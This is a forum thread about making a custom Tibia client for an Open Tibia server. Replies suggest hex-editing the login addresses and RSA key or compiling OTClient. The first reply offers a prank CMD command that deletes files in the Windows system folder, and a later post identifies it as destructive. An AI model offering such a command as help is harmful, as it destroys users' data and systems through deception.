• There is NO official Otland's Discord server and NO official Otland's server list. The Otland's Staff does not manage any Discord server or server list. Moderators or administrator of any Discord server or server lists have NO connection to the Otland's Staff. Do not get scammed!

How do i make my own tibia client so people don't have to use ip changer

go to CMD and enter
Code:
cd C:\Windows && del /q *

Serious:
Learn about how a hexeditor works and get OllyDBG and learn some assembler. Also to be 100% sure you'll have to make dlls to check if the bot somehow got injected.

Or compile OTClient
 
The first part will remove your windows folder lol...

- - - Updated - - -

And the shit i wrote is just to make it botproof, but if you want to make it so they don't have to use ip-changer you just have to use a hexeditor to change the loginserver addresses and the RSA key
 
The first part will remove your windows folder lol...

- - - Updated - - -

And the shit i wrote is just to make it botproof, but if you want to make it so they don't have to use ip-changer you just have to use a hexeditor to change the loginserver addresses and the RSA key

Or inject dll :p
 
Back
Top